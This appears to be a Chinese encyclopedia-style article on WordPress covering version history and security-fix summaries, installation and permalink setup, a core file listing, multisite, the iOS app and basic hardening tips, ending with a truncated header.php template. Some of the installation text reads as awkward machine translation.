WordPress 3.1.1 中文版本现已发布。此版本是修订版本,修复了 3.1 中包含安全问题在内的近 30 个问题。几个重要更新内容:
加强媒体文件上传的安全性性能改进增加对 ⅡS6 的支持修正分类和 PATHINFO(/index.php/)的固定链接问题修正了在某些极端情况下,数据库查询和分类法相关内容可能导致插件不兼容的问题3.1.1 版本包含了我们的安全团队成员、WordPress 核心开发者 Jon Cave 和 Peter Westwood 发现的 3 个安全问题。修复的内容分别是:修正媒体文件上传器包含的“跨站请求伪造”(CSRF)问题、修正在处理评论内容中极复杂链接时可能导致 PHP 崩溃的问题,以及修补“跨网站指令码”(XSS)漏洞。
WordPress 3.1.2
2011 年 4 月 27 日,WordPress 3.1.2发布,修补了版本中的安全漏洞。
版本中,投稿者级别的用户可以通过某种不正当方法发布文章。
问题是由我们的安全团队成员、WordPress 开发者Andrew Nacin和Benjamin Balter共同发现的。
我们建议您尽快更新,尤其是对于那些将默认用户角色设为了投稿者的站点。除此之外,本次更新还解决了一些没有来得及在 3.1.1 版本中修复的问题(英文)。WordPress 3.2Wordpress 发布,改进用户体验,让站长更好的建设自己的网站。
具体改进如下:后台样式2.默认主题
3.改进升级程序
4.广阔的写作空间
5.提升运行效率
6.PHP和MYSQL环境要求
详细可参考扩展阅读中"关注WordPress3.2"。
WordPress 3.1.4已经发布,这是一个维护和安全更新版本。这个版本更新主要是修复了编辑级别的用户可以恶意获得更多权限的bug。3.1.4同时也包括了其它的几个安全修复和安全加固措施。可以点击更新日志查看更新的内容。下载WordPress3.1.4或者在控制面板里面的更新获得版本。
WordPress 3.2.1
在 WordPress 3.2 版本下载量达到一百余万次之后,我们发布WordPress 3.2.1。这个维护版本修复了一些服务器上可能发生的 JSON 不兼容问题,同时还包括控制板样式和 Twenty Eleven 主题的小修补。
要查看所有修改,请访问中文 Codex 文档页面、更新历史(英文)或解决的工单列表(英文)。WordPress 3.3最新最棒的 WordPress 版本 —— 3.3 版本推出!本版本代号“Sonny”,献给伟大的爵士萨克斯手 Sonny Stitt 先生。您就可以在控制板升级啦!哦对了,差点忘了告诉您,从这个版本开始,中文版本将更强大的控制板(dashboard)改称为“仪表盘”了。
自 3.0 版本以来,WordPress 已经有了六万五千余次下载了,作为第三次对 3 系列的修订,本版本主要显著提升了您的使用体验:导航菜单、上传机制,以及导入以往备份等等。
面向用户
有经验的用户一定会喜欢全新的“拖放上传工具”、鼠标悬浮式导航菜单、一体化工具栏、增强的合作编辑体验、以及 Tumblr 导入工具。我们也关注新用户的体验。3.3 版本新增了“气泡提示”功能,在每次更新后,在功能上大幅度的改动会主动弹出提醒用户。同时,使用 3.3 版本新安装 WordPress 的用户会看到一个非常友好的消息框,提示如何开始使用 WordPress。每个页面上的“帮助”选项卡也有显著改进,实用性得到极大提升。站点的“仪表盘”也更加兼容 iPad 和其它平板电脑了。
中文版本方面本次新加入了中文字数统计功能,在您写文章时会自动统计中文字数和英文词数之和。
WordPress 3.3.1
这次WordPress的改动不大,总的来说是一个维护版本,这个维护版本修复了15个问题以及WordPress 3.3中存在的一个跨站点脚本漏洞。
WordPress 3.3.2
WordPress 3.3.2版本,有一个安全更新,解决了一些以前版本中发现的安全漏洞。根据官方公告,三个外部库获得安全更新:Plupload,SWFUpload和SWFObject。上述漏洞由 Neal Poole、 Partlan和Szymon Gruszecki三人披露。WordPress的3.3.2还解决了由该组织的核心安全团队确定的一些其他问题:
plupload(版本1.5.4),WordPress的上传媒体使用。
SWFUpload,WordPress的先前用于上传媒体,仍可能在插件中使用。
SWFObject,WordPress的先前用于嵌入Flash内容,并仍可能在插件和主题中使用。
WordPress 3.3.2也更新了:
网站管理员可以停用网络范围内的插件时,在特定情况下运行,是一个WordPress网络特权升级。
点击网址时的跨站点脚本漏洞。
当在旧版本的浏览器中进行评论和过滤网址后重定向跨站点脚本漏洞。WordPress 3.4WordPress 3.4发布更新,命名为吉他手Grant Green(guitarist Grant Green)。之所以将WordPress 3.4版本称为Green,是为了向吉他手Grant Green表示敬意,因为他深情而朴素的音乐在这个版本的开发过程中一直陪伴着大家。
WordPress 3.4在主题定制、自定义头部、Twitter的嵌入和图片标题等方面有了许多重大的改进。
新功能:
⒈主题预览功能增强
⒉头部大小可自定义
⒊可从媒体库中选择自定义头部和背景
⒋改进的查找和选择主题
⒌主题和插件的其它改进
改进:
⒈新的XML-RPC API(移动开发用的);
⒉自定义头部和背景API;
⒊WP_Query性能提升;
⒋国际化支持(主要是语言和本地化UI);
⒌当有大量已安装主题时的性能和API改进;
⒍支持直接从主题目录中安装子主题(即主题和子主题可以放一块了)。
WordPress 3.4.1
WordPress 3.4.1英文版及中文繁体版发布更新,中文简体版没有同步更新。这次的更新主要是3.4版本的一些bug。没有涉及功能性的改变。
修复了其中一个主题的页面模板,有时无法检测到的问题。解决一些类别一篇结构的问题。为更好地处理插件或加载的JavaScript错误的主题。添加上传的iOS 6设备上的图像的早期支持。允许常用的插件,用来检测网络的广泛激活的技术。运行某些版本的PHP(5.2.4,5.4)的服务器或罕见的设置(安全模式中,open_basedir),这造成了警告或在某些情况下更好的兼容性,防止被发送的电子邮件。3.4.1版还修复了一些安全问题,并包含了一些安全加固。这些漏洞包括潜在的信息披露,以及一个错误,影响多址安装不受信任的用户。由WordPress安全团队发现并解决了这些问题。
WordPress 3.4.2
2012年9月7日更新,该版本是个安全修复版本。
修复旧浏览器在后台管理区域的若干问题
修复某些情况下主题不能正确预览,或者缩略图不能正确显示的情况
提升插件兼容性
解决在某些固定链接结构下的翻页问题
禁止不当大小的顶部图片上传
避免某些引用通告和引用嵌入错误。4.2版本还修复了一些安全问题和做了些安全加固,该缺陷存在特权提升bug。在本次 3.4.2 版本更新中,引入了一个新的问题,导致自定义栏目功能无法使用。该问题已在 Trac 被确认。该问题在 SVN 中已被修复,在下一个版本中会包含这部分的修复代码。如果不想等待,请安装 Hotfix 插件来即时修复该问题。需要了解详情请看扩展阅读。WordPress3.5版本2012 年 12 月 , WordPress 3.5 正式版本已经发布。5版本最大的变化就是全新设计的照片上传和相册创建界面。多媒体功能不好用一直是 WordPress 的缺点,所以我们在这个版本中重点对此进行了加强。3.5 版本还包含了 Twenty Twelve 主题。它简洁、适用各种用途、可以在各种屏幕尺寸上查看。最后,我们对“仪表盘”的设计细节进行了优化,新功能包括对 Retina 显示屏的支持、选色器等
5版本的另一个重大变化是:在后台管理界面中最大的变化是链接管理不见了!这对于WordPress来说是一个有趣的事情,因为这几年来WordPress一直由于它越来越臃肿的体型而被诟病。当然这个变化也在WordPress社区中引发了无数的讨论,因为对于使用大量友情链接的用户来说,不见的链接管理确实是一个问题。不过正如之前所说,WordPress还是通过官方插件"Link Manager"的形式来补全了这个功能。事实上,这个插件只有一个只包含一行代码的php文件,如果你打开link-manager.php文件看一下,就发现下面这行代码:
add_filter( 'pre_option_link_manager_enabled', '__return_true' );WordPress 3.5.1版本修复 37 个问题。这也是一个安全更新。注意:由于一个程序问题,Windows 上运行 IIS 的用户无法自动从 3.5 升级到 3.5.1.请参考文档进行手动升级。
编辑器:解决 HTML 元素可能意外消失的问题。
多媒体:修正若干小工作流程问题和兼容性问题。
多站点:在创建新网络的时候提示使用正确的重写规则。
避免定时发布的一些 HTML 标签在发布时消失的问题。
临时解决了错误配置可能造成的仪表盘 JavaScript 异常的问题。
隐藏了插件错误使用数据库或用户 API 时的警告。由于一个程序问题,Windows 上运行 IIS 的用户无法自动从 3.5 升级到 3.5.1.参见文档(英文,请登录翻译)来手动升级。
WordPress 3.5.1 解决的安全问题如下:
使用 pingback 的远程端口扫描问题。该问题可能导致服务器信息泄露,或被攻击。这个问题影响所有的 WordPress 版本。特别感谢安全研究员 Gennady Kovshenin 和 Ryan Dewhurst 评估我们的工作。
shortcode 和文章内容的两处跨站攻击漏洞。由 WordPress 安全小组 Jon Cave 发现。
外部库 Plupload 的跨站漏洞。感谢 Moxiecode 开发者和我们一起研究、解决问题,感谢他们发布 Plupload 1.5.5.WordPress 3.5.22013 年 6 月 22 日,WordPress 3.5.2 简体中文版现已可用。这是 3.5 版本的第二个维护性发布,修复了 12 个 bug。这是对所有之前版本的安全更新,我们推荐您立即升级您所有的站点。WordPress 安全小组解决了 7 项安全问题,并且这次发布也包含了其他一些安全强化措施。
安全修复包括:
阻止了服务器端伪造请求攻击。该问题可能使得攻击者取得网站的权限。
禁止了贡献者不适当地发布文章或修改文章的作者,分别由 Konstantin Kovshenin 和 Luke Bryan 报告。
更新了 SWFUpload 外部库来修复跨站脚本隐患,由 mala 和 Szymon Gruszecki 报告。
阻止了一种拒绝服务攻击,这种攻击可能影响到使用受密码保护的文章的网站。
更新了 TinyMCE 外部库来修复跨站脚本隐患,由 Wan Ikram 报告。
修复了多种跨站脚本,由 Andrea Santese 和 Rodrigo 报告。
避免了在文件上传失败时透露完整路径,由 Jakub Galczyk 报告。WordPress3.6测试版2013年4月4号,WordPress官方博客发布了WordPress3.6测试版!
文章的格式:文章的格式和现有自己的UI和主题模版函数来完成访问结构化数据的过程;
二十三:我们在新的版本中,继续采用新的默认主题——二十三!二十三是一个无可挑剔的,色彩丰富,以博客为中心的主题,充分利用新邮支持格式。
音频/视频到您的文章,您可以嵌入音频和视频文件,无需依赖插件或第三方媒体托管服务。
自动转存:帖子本地自动保存。如果您的浏览器崩溃,您的计算机死亡,或者为你节省服务器脱机,您不会失去您的文章。
发布锁定:当有人正在编辑一个帖子,如果他们在自己的键盘上睡着了,那么它将被自动踢出来,
导航菜单:默认菜单已简化与手风琴UI,和一个单独的标签批量分配的菜单位置。
修订:新修订的UI功能界面,滑块,“磨砂”,通过历史,双滑盖范围比较。WordPress 3.62013年8月2日发布,新特点:
——全新的2013主题
新主题Twenty Thirteen是一个色彩丰富、以博客为中心的主题,并且支持所有的文章格式。
——改善的Revisions修订功能
修订功能将保存每一次的改动,并且新的界面允许你滚动查看是谁在什么时候做出了哪些修订,还可以快速恢复到任何修订版。
——自动保存和文章锁定
文章会自动保存在本地。如果你的浏览器崩溃,计算机死机,或者服务器掉线,都不会失去你的文章。对于多作者的网站,文章锁定可以防止出现内容错乱。
——内置HTML5媒体播放器
你可以直接在文章中嵌入音频和视频文件,无需依赖插件或第三方服务。WordPress 3.7.12013年10月30日发布,新特点:有说明的图像可在可视化编辑器中正确显示。
使得部分较旧或未得到妥善配置的服务器上的站点能够继续从官方网站检查更新。
防止因部分插件过早地调用部分WordPress函数而造成的致命错误。
修正了get_pages()中的层级排序、wp_list_categories()中的排除项、和以空值调用in_category()时的行为。
修复了在搜索时可能出现的警告和一些其他提示。
WordPress 3.82013年12月13日发布,此版本命名为“Parker”,以纪念查利·帕克,波普爵士乐的先驱者。这可能是迄今为止最美丽的更新。新特性:Modern审美界面设计:新的WordPress版本整个界面焕然一新,干净清晰简洁。
利落的版式:The Open Sans版式提供了简洁、友好的文本显示模式,并且能够根据桌面或者移动端进行自动适应。
精致的对比:凭借卓越的对比度和宽大舒适的类型,新的设计很容易阅读和愉快浏览。
高速环境下的高清显示:WordPress能够根据你的屏幕来自动调整文字的显示,新的矢量图形在页面缩放中能够比以往任何时刻都来的清晰。
管理员配色方案:WordPress包含了8个全新的管理员配色方案,能够在你的设置页面中进行预览和更换。
精致的主题管理:新的主题屏幕能够让你的主题一目了然。
丰富的小工具:小部件已经被简化。在大型屏幕中显示能够显示多个部件的叠加。在平板上只需要一个小工具就能来添加它。
WordPress 4.12014年12月23日发布,此版本命名为“Dinah”,以纪念爵士歌手黛娜·华盛顿。WordPress 4.1中的新功能帮助您聚焦于您的写作,新的默认主题也能让您有型地展示您的文章。新特性:
Twenty Fifteen新主题:最新的默认主题,是一套以明晰为中心的面向博客的主题,简单的排版在任何屏幕尺寸上都容易阅读。。
免打扰写作:有时,您需要集中精力遣词造句。试试打开免打扰写作模式,在您开始打字时,所有会让您分心的东西都会淡出,让您只注意您的写作。您的所有编辑工具都会在您需要用到它们时立刻出现。
细节变化:WordPress 4.1已经有了40多种语言版本;如忘记在公用电脑上登出,现在可以前往个人资料页面并登出所有会话;嵌入来自Vine的视频也已被简化为了将URL粘贴进文章里;插件安装器现在会为您推荐值得一试的插件,推荐是基于您和其他用户已经安装的插件做出的。历史版本WordPress的发行版都用著名的爵士音乐家的名字命名。举例来说,WordPress 1.2的代号为Mingus(咆勃爵士乐中贝斯手Charles Mingus的姓)。
WordPress 1.5在2005年2月中旬发布,代号为Strayhorn。它新增了一系列重要的新功能。其中一个是能够管理静态页面。这使得用户可以创建和编辑脱离传统博客的时间排列方式的页面,这也是WordPress从简单的博客管理软件成为一个全面的内容管理系统(CMS)的第一步。另一个新增功能是新的模板/主题系统,从而可以让用户轻松启动和关闭“皮肤 ”(模板)。在WordPress还配备了新的默认模板(代号为Kubrick)设计者为Michael Heilemann。
WordPress 2.0在2005年12月发布,代号为Duke。这个版本加入了富文本编辑功能,更好的管理工具,图片上传功能,更快的发布功能,改进的导入系统,以及彻底变革的后端管理部分。WordPress 2.0也为插件开发者带来了很多进步和改变。
WordPress 2.1在2007年1月22日发布,代号为Ella。除了解决安全问题的一些更新以外,2.1版还增加了重新设计的界面和增强的编辑工具(包括集成拼写检查和自动储存),改进的内容管理选项,以及各种代码和数据库的优化。
WordPress 2.2在2007年5月16日发布,代号为Getz。2.2版的特性包括在模板中支持窗口小部件(Web widget),更新对Atom Feed的支持,以及速度上的优化。
WordPress 2.3在2007年9月24日发布,代号为Dexter。2.3版本的功能包括:内置了标签(Tags)的支持,新的分类系统,更新的通知功能,以及其他界面的改善。2.3也充分支持遵循发布协议的Atom 1.0。在WordPress 2.3还包括一些急需的安全性修正。
WordPress 2.5在2008年3月29日发布,代号为Brecker。开发者跳过发行版2.4而直接发布2.5 ,所以2.5版包含算得上两个版本号更新的新代码。WordPress 2.5有着一个彻底重新设计的管理界面,甚至WordPress的官方网站也进行了重新设计以配合新的风格。
WordPress 2.6在2008年7月15日发布,代号为Tyner。它包含了许多新功能,使得WordPress成为了一个更加强大的内容管理系统(CMS):可以跟踪每一篇文章和页面的修改(比较适用于多人协作撰写的博客,以及从互联网的任何地方发出文章的功能,以及几十个对2.5版引入的新功能的改善。7相关信息编辑
开发者WordPress的主要的开发者是Ryan Boren和Matthew Mullenweg。 Matthew Mullenweg和Mike Little是这个项目的共同创办人。 做出主要贡献的开发者包括:
Dougal Campbell Mark Jaquith
Donncha O'Caoimh Andy Skelton
Michel Valdrighi Peter Westwood
虽然WordPress有很大一部分是由它的爱好者团体所开发和维护的,但是它的主要开发者其实大多是Automattic公司的雇员,WordPress也就因此与该公司有着密切的联系。
WordPress的开发者团体中,测试者也对开发做出了一定的贡献。他们无偿地付出时间和辛劳来测试每一个版本。他们可以把发现的错误和问题提交到邮件列表,也可以提交到 WordPress 项目的Trac平台上。这个平台方便开发者们管理源代码和报告bug,从而使得众多 WordPress 爱好者们都能参与到它的开发中。下载安装第1步:下载并提取安装包
下载并解压缩WordPress的安装包
将WordPress上传到远程服务器时,首先需要在浏览器中将WordPress安装包下载到本地机器,然后解压。
如果用shell进入web服务器且熟练掌握基于控制台的工具,而又不想用FTP,可以用wget(或lynx或其它基于控制台的web浏览器)将WordPress直接下载到web服务器上:1、wget 可以去官网下载;2、然后用tar -xzvf latest.tar.gz 解压安装包
WordPress安装包会被解压到一个名为wordpress的文件夹中,该文件夹与latest.tar.gz在同一目录下。
如果不能用shell来访问web服务器,也不习惯使用基于控制台的工具,还可以用 ZipDeploy将WordPress直接下载到web服务器上
[WordPress] WordPress
第2步:创建数据库和用户
如果使用的是托管服务提供商,可能已经拥有了WordPress的数据库,建立了,或可能有一个自动安装的解决办法这样做。检查托管服务提供商的支持网页或控制面板为线索,不论需要创建一个手动。
如果确定,需要创建一个手动,请按照指示进入phpMyAdmin的各种服务器,或按照指示使用的cPanel或使用phpMyAdmin如下。
如果正在安装WordPress的自己的网络服务器,按照使用phpMyAdmin或使用MySQL客户端下面的说明来建立WordPress的用户名和数据库。
如果只有一个数据库,它已在使用中,可以安装WordPress的中-只要确定有其特殊的前缀为表格,避免过度书面任何现有的数据库表。
第3步:设置 config.php
在接下来的部分,代码将期待变化如下:
界定/ /更改为一个独特的词组。
回到WordPress的提取包中第1步,重命名该文件配置sample.php以, config.php。
打开改名, config.php文件中最喜爱的文本编辑器,并填写下列资料,按上面的范例:
DB_NAME
资料库名称建立在WordPress的第2步。
DB_USER
用户名创建的WordPress的在第2步。
DB_PASSWORD
密码选择的WordPress的用户名在第2步。
DB_HOST
主机名称确定第2步(通常是本地主机,但并不总是。见一些可能DB_HOST值)。
DB_CHARSET
该数据库的字符集,通常不应改变。见编辑, config.php的细节。
DB_COLLATE
该数据库的排序一般应留空。见编辑, config.php的细节。
保存该文件。
为更广泛的细节,一步一步指示建立的配置文件,是指编辑, config.php。
如需关于启用SSL在WordPress的2.6 ,看到的SSL和Cookies在WordPress的2.6。
第4步:上传的文件
将需要决定在哪里在网站上想要博客显示:
在根目录中的网站。
子目录中的网站上。
注:位置的根网页目录中的文件在Web服务器上不同的托管服务提供商和操作系统。请与托管服务提供商或系统管理员,如果不知道在哪里,这是。
在根目录
如果需要将文件上传到Web服务器,使用最喜爱的FTP客户端上传的所有内容WordPress的目录(但不包括目录本身)的根目录网站。
如果档案已经在Web服务器,以及正在使用shell进入安装WordPress的,将所有的内容WordPress的目录(但不包括目录本身)的根目录网站。
子目录
如果需要将文件上传到Web服务器,请重新命名WordPress的目录,想要的名称,然后使用最喜爱的FTP客户端上传目录,想要的位置的根目录网站。
第五步:设置固定链接(伪静态)
WordPress 固定链接结构标签:
%year%:表示“年”, 格式:2004
%monthnum%:表示“月”,格式:05
%day%:表示“日”,格式:28
%hour%:表示“时”,格式:15
%minute%:表示“分”,格式:43
%second%:表示“秒”,格式:33
%postname%:表示“文章名”,如文章标题是“boke8 very good,博客吧,非常好”,那么永久链接就会显示“boke8-very-good-博客吧,非常好”,其中的中文可以在添加文章时编辑为英文或数字等。
%post_id%:表示文章的ID,格式:423
%category%:表示“分类”,格式:例如分类别名为“wordpress博客”,那么永久链接就会出现“WordPress博客”,显示的是分类名称的别名,不想显示中文,可以编辑分类名称的别名为英文或拼音等。
%tag%:表示“标签”,不用说,参考“分类”
%author%:表示“作者”,显示的是作者的昵称,格式参考“分类”
设置固定链接方法:
登陆博客后台,进入设置菜单下的固定链接,选择“自定义结构”,然后在后面的输入框里输入自己的组合,
格式可以是:
/标签/ 实例:/%postname%/
/标签/标签/标签 实例:/%category%/%author%/%postname%
/标签/标签.html实例:/%author%/%postname%.html
……
用多少个标签组合根据自己的喜好,但加标签前面记得要加”/”。如果喜欢博客吧的URL形式,可以后标签后面加后缀,如.html或其它的。
博客吧的固定链接:
/%postname%.html” ,然后显示的地址形式为http://域名/文章名.html
其它例子,可以在配置链接里参考:日期和文章名、月份和文章名、数字,把相关的对照一下标签即可。
如果需要设置自定义的固定链接,需要对web服务器的设置进行修改,以NGINX为例,需要在web服务器的配置文件增加以下几句:
location / {
try_files $uri $uri/ /index.php?q=$uri&$args;
}
第六步:PING列表设置
的作用是为了增加搜索引擎收录
PING设置:
登陆博客后台,进入设置菜单下的撰写,选择“更新服务”,然后在后面的输入框里输入PING列表地址目录文根目录
1.index.php:wordpress核心索引文件,即博客输出文件。
2.license.txt:WordPress GPL许可证文件。
3.my-hacks.php:定义了博客输出之前处理的追加程序。默认安装中并没有这个文件,但如果存在,它就会被管理页面引用。
4.readme.html:WordPress安装导言。
5.wp-atom.php:输出Atom信息聚合内容。
⒍wp-blog-header.php:根据博客参数定义博客页面显示内容。
7.wp-cron.php
8.wp-comments-post.php:接收评论,并把其添加到数据库。
9.wp-commentsrss2.php:用来生成日志评论的RSS2信息聚合内容。
10.wp-config-sample.php:把WordPress连接到MySQL数据库的示例配置文件。
11.wp-config.php:这是真正把WordPress连接到MySQL数据库的配置文件。默认安装中虽不包括它,但由于WordPress运行需要这一文件,因此,用户需要编辑这个文件以更改相关设置。
12.wp-feed.php:根据请求定义feed类型并其返回feed请求文件。
13.wp-links-opml.php:生成OPML格式的链接(通过WordPress管理菜单添加)列表。
14.wp-login.php:定义注册用户的登陆页面。
15.wp-mail.php:用来获取通过邮件提交的博文。这个文件的URL通常被添加到cron任务中,这样cron就会定期检索文件并接收邮件日志。
16.wp-pass.php:审核受密码保护文章的密码并显示被保护文章。
17.wp-rdf.php:生成RDF信息聚合内容。
18.wp-register.php:允许新用户通过联机表单注册用户名。
19.wp-rss.php:生成RSS信息聚合内容。
20.wp-rss2.php:生成RSS2信息聚合内容。
21.wp-settings.php:运行执行前的例行程序,包括检查安装是否正确,使用辅助函数,应用用户插件,初始化执行计时器等等。
22.wp-trackback.php:处理trackback请求。
23.wp.php:显示博客日志的简单模板。并没有什么神奇之处,但包括了部分index.php内容。
24.xmlrpc.php:处理xmlrpc请求。用户无需通过内置的网络管理界面就可发布文章。
wp-adminwp-admin/admin.php:管理文件的核心文件。用来连接数据库,整合动态菜单数据,显示非核心控制页面等。2.wp-admin/admin-db.php
3.wp-admin/admin-footer.php:定义所有管理控制台的页脚。
4.wp-admin/admin-functions.php:定义了管理控制台使用的多种函数。5.wp-admin/admin- header.php:定义了管理控制台的上半部分内容,包括菜单逻辑 (menu logic)的 menu-header.php文件。
6.wp-admin/bookmarklet.php:使用书签功能时,定义弹出页面。撰写日志时使用默认的edit-form.php文件。
7.wp-admin/categories.php:定义管理页面的类别管理。参考:Manage – Categories
8.wp-admin/cat-js.php
9.wp-admin/edit.php:定义管理页面的日志管理。参考:Manage – Posts
10.wp-admin/edit-comments.php:定义管理页面的评论管理。参考:Manage – Comments
11.wp-admin/edit-form-advanced.php:定义管理页面的日志高级编辑形式管理,包括post.php。参考:Write – Write Post – Advanced
12.wp-admin/edit-form.php:定义管理页面的日志简单编辑形式管理,包括post.php。参考:Write – Write Post
13.wp-admin/edit-form-comment.php:编辑特定日志评论。
14.wp-admin/edit-form-ajax-cat.php
15.wp-admin/edit-link-form.php
16.wp-admin/edit-page-form.php:定义管理模块页面的页面编辑,包括post.php和page-new.php。参考:Write – Write Page
17.wp-admin/edit-pages.php:定义管理模块页面的页面管理。参考:Manage – Pages
18.wp-admin/execute-pings.php
19.wp-admin/import.php
20.wp-admin/index.php:默认管理页面。根据用户请求显示相应的页面。
21.wp-admin/inline-uploading.php
22.wp-admin/install-helper.php:定义数据库维护函数,包括popular-in-plugins maybe_create_table() 和maybe_add_column()。
23.wp-admin/install.php:安装WordPress。
24.wp-admin/link-add.php:链接添加。参考:Links – Add Link
25.wp-admin/link-categories.php:链接分类管理。参考:Links – Link Categories
26.wp-admin/link-import.php:导入链接。参考:Links – Import Links
27.wp-admin/link-manager.php:链接管理。参考:Links – Manage Links
28.wp-admin/link-parse-opml.php:导入链接时,用来解析OPML文件。
29.wp-admin/list-manipulation.js
30.wp-admin/list-manipulation.php
31.wp-admin/menu-header.php:用于在管理界面显示菜单。wp-admin/menu.php:定义了默认管理菜单结构。33.wp-admin/moderation.php:定义了评论审核函数。
34.wp-admin/options.php:升级后,用来更改所有设置。
35.wp-admin/options-discussion.php:管理评论和trackback相关选项。参考:Options – Discussion
36.wp-admin/options-general.php:管理基本配置选项。参考:Options – General
37.wp-admin/options-head.php
38.wp-admin/options-misc.php:设置文件上传,链接跟踪,自定义”hacks”等相关选项。参考:Options – Miscellaneous
39.wp-admin/options-permalink.php:管理永久链接选项。参考:Options – Permalinks
40.wp-admin/options-reading.php:设置如何把网站信息发送到读者浏览器或其它应用程序。参考:Options – Reading
41.wp-admin/options-writing.php:管理日志撰写界面。参考:Options – Writing
42.wp-admin/page-new.php:创建新页面。
43.wp-admin/plugin-editor.php:编辑插件文件。
44.wp-admin/plugins.php:管理插件。
45.wp-admin/post.php:创建新日志。
46.wp-admin/profile-update.php
47.wp-admin/profile.php:管理个人资料或配置。
48.wp-admin/setup-config.php:安装时,用来创建wp-config.php文件。
49.wp-admin/sidebar.php
50.wp-admin/templates.php:编辑服务器可写文件。
51.wp-admin/theme-editor.php:编辑特定主题中的文件。
52.wp-admin/themes.php:管理主题。
53.wp-admin/update-links.php
54.wp-admin/upgrade-functions.php:定义了版本升级函数。
55.wp-admin/upgrade-schema.php:定义了升级中使用的默认表格结构和选项。
56.wp-admin/upgrade.php:版本升级。
57.wp-admin/user-edit.php:编辑用户。
58.wp-admin/users.php:管理用户。
59.wp-admin/wp-admin.css:定义了管理控制台的默认样式表。
60.wp-admin/xfn.js
wp-includes
1.wp-includes/cache.php
2.wp-includes/capabilities.php
3.wp-includes/class-ⅨR.php:IncutioXML-RPC库。包括了 XML RPC支持函数。
4.wp-includes/classes.php:包括了基本的类,如核心文章提取机制WP_Query和改写管理WP_Rewrite。
5.wp-includes/class-pop3.php:包括了支持使用POP邮箱的类。可供wp-mail.php使用。
6.wp-includes/class-snoopy.php:Snoopy是一个PHP类,用来模仿Web浏览器的功能,它能自动完成检索网页和发送表单的任务。
7.wp-includes/comment-functions.php
8.wp-includes/default-filters.php
9.wp-includes/feed-functions.php
10.wp-includes/functions-compat.php:即新版本PHP中用来支持老版本PHP的函数文件。
11.wp-includes/functions-formatting.php:用于清理XHTML和用特定字符集正确格式化文本。
12.wp-includes/functions-post.php:定义了在数据库中管理日志,查询用户权限,提取和撰写评论等函数。
13.wp-includes/functions.php:包含许多重要的支持函数,它是WordPress中最大的文件,函数数量几乎是第二大文件的两倍。
14.wp-includes/gettext.php:PHP-gettext GPL 翻译库组成部分。
15.wp-includes/kses.php:用来渲染和过滤日志或评论中的HTML。
16.wp-includes/links.php:用来管理和使用WordPress的链接功能。
17.wp-includes/locale.php:用来替代默认的星期和月份值。
18.wp-includes/pluggable-functions.php
19.wp-includes/registration-functions.php
⒛wp-includes/rss-functions.php
21.wp-includes/streams.php:定义了包装文件流和字符流的类。
22.wp-includes/template-functions-author.php:包含了与日志作者或评论人相关的主题函数。
23.wp-includes/template-functions-category.php:包含了与类别相关的主题函数。
24.wp-includes/template-functions-comment.php:包含了与评论相关的主题函数。
25.wp-includes/template-functions-general.php:包含了常规主题函数。
26.wp-includes/template-functions-links.php:包含了与链接相关的主题函数。
27.wp-includes/template-functions-post.php:包含了与日志相关的主题函数。
28.wp-includes/template-functions.php:包含了以上所有”template-”文件。
29.wp-includes/template-loader.php
30.wp-includes/vars.php:用来设置杂项变量。
31.wp-includes/version.php:用来设置当前使用的WordPress版本。
32.wp-includes/wp-db.php:包含了用来连接MySQL数据库的函数。
33.wp-includes/wp-l10n.php:提供支持多语言版本的函数。多用户2006年10月23日,WordPress开发组正式发布WordPress多用户版──WordPress MU。
WordPress本身提供了多作者的功能,而WordPress MU则用来搭建BSP(Blog Service Provider)网站,可以构建多用户站点或为用户提供建站(建博客)服务,让每一个用户都可以创建一个或多个独立的Blog。
WordPress MU已经被集成进WordPress之中,成为WordPress 3.0的一部分。不过这个功能在WordPress 3.0中默认是关闭的,必须要在“wp-config.php”中打开方能使用。此外,WordPress MU对服务器及技术要求都比WordPress要高,有时一些主题模板、插件都未必能够运行。一般共享主机都会有所限制。升级在推出3.0版本的不到三个月时间里,iOS版WordPress就进行了重大更新。WordPress 3.0于5月份发布,提供了推送功能和评论工具栏,但是新发布的3.1版则是一个重大改革。
[iOS版WordPress3.1版] iOS版WordPress3.1版
新版本中用户界面更具新引力,采用了全新的UI设计。此外,新版本中还增加了滑动侧边栏功能,用于快速导航,而且添加了新的颜色和图形。
iPhone手机用户上的WordPress用户界面有一个隐藏的侧菜单,通过屏幕左上角的按钮可以访问,类似于Facebook应用程序。在iPad上则看起来更像是iPad版的Twitter。
新版本的重大更新还包括注册页面和应用程序图标的改进,以及一个全新的WordPress好友搜索功能,可以帮助你找到WordPress博客上的朋友。另外该应用程序中在横向模式下也可以使用,而且访问自己的博客和应用程序内部的仪表板更加便捷。
此次iOS版WordPress 3.1专为iPad用户提供了一些新功能,如WordPress阅读器,以及图片快速上传功能。兼容性该应用程序可以在App Store上免费下载,可兼容iOS 4.0或更高版本。8安全设置编辑
升级WordPress程序版本
隐藏WordPress程序版本
更改WordPress用户名
更改WordPress用户密码
防止WordPress目录显示
保护wp-admin文件夹
针对搜索引擎进行屏蔽保护
安装Login Lockdown插件
WordPress数据库安全
WordPress安全扫描
对wordpress所有空间进行安全漏洞检查WordPress 3.6 Beta1
WordPress发布了3.6的首个Beta测试版本,3.6将包含如下几个方面的改进:
Post Formats: 可以单独给每篇文章设置不同主题,主题作者可访问模板函数和结构化数据
Twenty Thirteen: 全新主题,色彩丰富,侧重博客
Audio/Video: 你可嵌入音频和视频到文章,无需通过插件或者第三方媒体托管服务
Autosave: 文章可自动在本地保存,如果你的浏览器崩溃或者计算机宕机或者服务器掉线都不会丢失数据
Post Locking: 当某人正在编辑文章时,锁定文章不让看
Nav Menus: 导航菜单进行简化,使用卷帘式UI和独立的Tab
Revisions: 全新的界面功能的修改头像,通过滑块从历史记录中选择并提供两栏的范围比较
主要功能包括:
文章格式:
主题搜索:
内部链接:
管理工具拦:
交互式管理;
更新内置编辑器;
多分类查询;
自定义文章类型索引页;
清理后台CSS;
用户管理;
网络管理;
密码重置归来。 收起阅读 »
wordpress程序的header.php顶部文件制作
下面是教材中的全部代码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DT ... gt%3B <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>Nature's Charm by Free CSS Templates</title> <meta name="keywords" content="" /> <meta name="description" content="" /> <link href="default.css" rel="stylesheet" type="text/css" media="screen" /> </head> <body> <!-- start header --> <div id="header"> <div id="logo"> <h1><a href="#">nature's charm </a></h1> <h2><a href="http://www.freecsstemplates.org/">By Free CSS Templates</a></h2> </div> <div id="menu"> <ul> <li class="active"><a href="#" 